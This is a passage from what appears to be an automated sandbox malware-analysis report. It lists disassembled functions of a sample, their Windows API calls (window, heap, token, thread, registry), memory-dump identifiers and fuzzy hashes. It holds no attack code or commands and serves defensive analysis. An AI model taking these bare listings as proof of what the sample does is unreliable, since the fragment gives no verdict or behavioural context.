                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                      • String ID:
                                                                      • API String ID: 2864067406-0
                                                                      • Opcode ID: 671032604aef52b406a374da5eb718b3b43067c39ad9ab3ca45991fcb191253b
                                                                      • Instruction ID: 9962df3fdd35bb8345cf50ff62c3762df20266b21077667121f7ba71c07ee0bb
                                                                      • Opcode Fuzzy Hash: 671032604aef52b406a374da5eb718b3b43067c39ad9ab3ca45991fcb191253b
                                                                      • Instruction Fuzzy Hash: 3721D135610118EFCB298F98CC98FFE3BB9EF49360F044055F91557261C7719A90EB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileAttributesW.KERNEL32(?,00C3CB68), ref: 00C0D2FB
                                                                      • GetLastError.KERNEL32 ref: 00C0D30A
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C0D319
                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C3CB68), ref: 00C0D376
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 2267087916-0
                                                                      • Opcode ID: d2dbd6fe5765b7a881bdc36361bddb53e2c1e6670e2245760ab3368c40b71863
                                                                      • Instruction ID: 43b9421a44599c5b424f930376e7fd43dff73720295812526f56aa148edbe27f
                                                                      • Opcode Fuzzy Hash: d2dbd6fe5765b7a881bdc36361bddb53e2c1e6670e2245760ab3368c40b71863
                                                                      • Instruction Fuzzy Hash: 0D219C705083019FC700DF68C8819AEB7F8AE5A764F104A5DF4AAD32E1DB31DA46CB93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C01571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C01014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C0102A
                                                                        • Part of subcall function 00C01014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C01036
                                                                        • Part of subcall function 00C01014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C01045
                                                                        • Part of subcall function 00C01014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C0104C
                                                                        • Part of subcall function 00C01014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C01062
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C015BE
                                                                      • _memcmp.LIBVCRUNTIME ref: 00C015E1
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C01617
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C0161E
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                      • String ID:
                                                                      • API String ID: 1592001646-0
                                                                      • Opcode ID: b91f20ba3d271aafd18b33b20d932ceb4232ba6567bcf07b63f5c88e0f37d320
                                                                      • Instruction ID: 465ae430702812ac6423dd852e38a032985023cbd945223f83b3390c0184fcb5
                                                                      • Opcode Fuzzy Hash: b91f20ba3d271aafd18b33b20d932ceb4232ba6567bcf07b63f5c88e0f37d320
                                                                      • Instruction Fuzzy Hash: 5E216931E00108AFDB14DFA4C985BEEB7B8EF44354F084459E851AB281E731AA45DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C32782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00C3280A
                                                                      • SetWindowLongW.USER32 ref: 00C32824
                                                                      • SetWindowLongW.USER32 ref: 00C32832
                                                                      • SetLayeredWindowAttributes.USER32 ref: 00C32840
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long$AttributesLayered
                                                                      • String ID:
                                                                      • API String ID: 2169480361-0
                                                                      • Opcode ID: 59ad1b82efc54d80cb7988d8c970b07ca76d0748fdc7320fe5edff90f000a1bc
                                                                      • Instruction ID: f6943ed6cb8cb8e74753b45defa50bdd807a799a031c1af2f5fda361df7a4a13
                                                                      • Opcode Fuzzy Hash: 59ad1b82efc54d80cb7988d8c970b07ca76d0748fdc7320fe5edff90f000a1bc
                                                                      • Instruction Fuzzy Hash: 7421D332228111AFDB149B24C895FAA7B95FF46324F148158F4268B6E2C771FD82C791
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C078F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C08D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00C0790A,?,000000FF,?,00C08754,00000000,?,0000001C,?,?), ref: 00C08D8C
                                                                        • Part of subcall function 00C08D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00C08DB2
                                                                        • Part of subcall function 00C08D7D: lstrcmpiW.KERNEL32(00000000,?,00C0790A,?,000000FF,?,00C08754,00000000,?,0000001C,?,?), ref: 00C08DE3
                                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00C08754,00000000,?,0000001C,?,?,00000000), ref: 00C07923
                                                                      • lstrcpyW.KERNEL32(00000000,?), ref: 00C07949
                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C08754,00000000,?,0000001C,?,?,00000000), ref: 00C07984
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                      • String ID: cdecl
                                                                      • API String ID: 4031866154-3896280584
                                                                      • Opcode ID: 1665bac605e99197219246467266e9e0b5cd8be50f2b9e124c1e1ee050bd9021
                                                                      • Instruction ID: 036f430289170e3178c43a05ef5b99fc5fb8f567bddf945a25400278e0570f42
                                                                      • Opcode Fuzzy Hash: 1665bac605e99197219246467266e9e0b5cd8be50f2b9e124c1e1ee050bd9021
                                                                      • Instruction Fuzzy Hash: DF11063A200302ABCF156F34DC45E7E77A9FF45350B00412AF842C72A4EB31D911D7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C37CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00C37D0B
                                                                      • SetWindowLongW.USER32 ref: 00C37D2A
                                                                      • SetWindowLongW.USER32 ref: 00C37D42
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00C37D6B
                                                                        • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID:
                                                                      • API String ID: 847901565-0
                                                                      • Opcode ID: b49ce03331241c2a792d6e548d436e8aa3189f11156873c369901b3062a0b1d9
                                                                      • Instruction ID: 914d4ebeb63152ef623ed7262d62a489cee38c533a10fceef9b0892cddfe0d23
                                                                      • Opcode Fuzzy Hash: b49ce03331241c2a792d6e548d436e8aa3189f11156873c369901b3062a0b1d9
                                                                      • Instruction Fuzzy Hash: 6E11DF72224654AFCB208F28CC04BAA3BA4AF453B0F258324FD39D72F0D7308A51DB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C35660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 00C356BB
                                                                      • _wcslen.LIBCMT ref: 00C356CD
                                                                      • _wcslen.LIBCMT ref: 00C356D8
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C35816
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend_wcslen
                                                                      • String ID:
                                                                      • API String ID: 455545452-0
                                                                      • Opcode ID: 5f83bc062c542861c8e645d9ffbd277a75cc0a38fa73708f99cc852d6b894ab5
                                                                      • Instruction ID: bcd60e81419745a77166ab89adb6a4098cc9513ada2ce302c52970f1839e219e
                                                                      • Opcode Fuzzy Hash: 5f83bc062c542861c8e645d9ffbd277a75cc0a38fa73708f99cc852d6b894ab5
                                                                      • Instruction Fuzzy Hash: 0F11B1B16206189ADB20DF658C86BEE77BCAF11760F50406AF925D6181EB708B80CF64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C01A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00C01A47
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C01A59
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C01A6F
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C01A8A
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 050af3e10a543b592f07ed3d59a445f24eb7956903b2c76e1e3e766eb9a7616d
                                                                      • Instruction ID: 57961d7aec1394256abeabe10ff5804486d9bc5bf038ae1b6a6c40831c1c17ce
                                                                      • Opcode Fuzzy Hash: 050af3e10a543b592f07ed3d59a445f24eb7956903b2c76e1e3e766eb9a7616d
                                                                      • Instruction Fuzzy Hash: 4011F73AA01219FFEB119BA5CD85FADFB78EB08750F240091EA14B7290D6716F50EB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00C0E1FD
                                                                      • MessageBoxW.USER32 ref: 00C0E230
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C0E246
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C0E24D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                      • String ID:
                                                                      • API String ID: 2880819207-0
                                                                      • Opcode ID: 44c75edaaa2febe3055fe899ece7e5daf2cb950b20b12cc21b8fb77135674053
                                                                      • Instruction ID: fcdb60e9f40711340f5460e1b142060804228063922daf3f146eea440bf6f1b9
                                                                      • Opcode Fuzzy Hash: 44c75edaaa2febe3055fe899ece7e5daf2cb950b20b12cc21b8fb77135674053
                                                                      • Instruction Fuzzy Hash: 5311C876904254BBC7019BAC9C49B9E7FAC9B45324F044669F924E32D1D670CA44C7A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BCD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateThread.KERNEL32(00000000,?,00BCCFF9,00000000,00000004,00000000), ref: 00BCD218
                                                                      • GetLastError.KERNEL32 ref: 00BCD224
                                                                      • __dosmaperr.LIBCMT ref: 00BCD22B
                                                                      • ResumeThread.KERNEL32(00000000), ref: 00BCD249
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                      • String ID:
                                                                      • API String ID: 173952441-0
                                                                      • Opcode ID: 28f15ff2a8e5e30287cf0f073ddf3d8f00d9a52db8e2b0884b4e7ca187236b76
                                                                      • Instruction ID: 616595278a69d60f055009694e05547546e177fc8e3851d5b7a4d81a3b9d1e30
                                                                      • Opcode Fuzzy Hash: 28f15ff2a8e5e30287cf0f073ddf3d8f00d9a52db8e2b0884b4e7ca187236b76
                                                                      • Instruction Fuzzy Hash: DE01D67A4051047BC7115BA5DC49FAE7AEDDF81331F1002ADF925AA1E0DB70C901D7A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateWindowExW.USER32 ref: 00BA604C
                                                                      • GetStockObject.GDI32(00000011), ref: 00BA6060
                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BA606A
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                      • String ID:
                                                                      • API String ID: 3970641297-0
                                                                      • Opcode ID: 88cc219026a49f027aeece8a36279a3f6129530f1d5fe671fa19ab642fb9eb79
                                                                      • Instruction ID: 505170ae86fbcb30247c9235bd58e2cf8ed8768269fa9bdb2e20225ef826aeff
                                                                      • Opcode Fuzzy Hash: 88cc219026a49f027aeece8a36279a3f6129530f1d5fe671fa19ab642fb9eb79
                                                                      • Instruction Fuzzy Hash: A61161B2505549BFEF264FA49C84FEE7BA9EF0A354F090155FA1452110D7329CA0EB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BC3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00BC3B56
                                                                        • Part of subcall function 00BC3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00BC3AD2
                                                                        • Part of subcall function 00BC3AA3: ___AdjustPointer.LIBCMT ref: 00BC3AED
                                                                      • _UnwindNestedFrames.LIBCMT ref: 00BC3B6B
                                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00BC3B7C
                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00BC3BA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                      • String ID:
                                                                      • API String ID: 737400349-0
                                                                      • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                      • Instruction ID: 9cd57fbded81cc45a84f9107489d06b73e5915930c558d470c172a5c4bcf4694
                                                                      • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                      • Instruction Fuzzy Hash: C3011732100148BBDF125E95CC42EEB7BEDEF58B54F448098FE4856121C732E9619BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C07464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00C0747F
                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C07497
                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C074AC
                                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00C074CA
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                      • String ID:
                                                                      • API String ID: 1352324309-0
                                                                      • Opcode ID: a3fc5e462275e39806ecf160ed55b41c607037c75e2688191f01d68b4b093142
                                                                      • Instruction ID: 83418bb90f4861146e5286638e10f46c4b93d29b7d65cf66817ba4ae1d953ba0
                                                                      • Opcode Fuzzy Hash: a3fc5e462275e39806ecf160ed55b41c607037c75e2688191f01d68b4b093142
                                                                      • Instruction Fuzzy Hash: 2E11C4B5A053149FE7208F94DC48FAA7FFCEB00B00F108669A666D6191D7B0F944DF60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C0ACD3,?,00008000), ref: 00C0B0C4
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C0ACD3,?,00008000), ref: 00C0B0E9
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C0ACD3,?,00008000), ref: 00C0B0F3
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C0ACD3,?,00008000), ref: 00C0B126
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CounterPerformanceQuerySleep
                                                                      • String ID:
                                                                      • API String ID: 2875609808-0
                                                                      • Opcode ID: a93d38b4faee127a171df01743514cfa5c56ba0cece8551efd8f7b332897e283
                                                                      • Instruction ID: 418d68d1ed86753bbe163a4795936f45b58a11f62645bf22c1c81449d8efdcad
                                                                      • Opcode Fuzzy Hash: a93d38b4faee127a171df01743514cfa5c56ba0cece8551efd8f7b332897e283
                                                                      • Instruction Fuzzy Hash: 91113971C01928E7CF00EFA5E998BEEBB78FF19711F104085DA51B2181CB309A60DB91
                                                                      Uniqueness

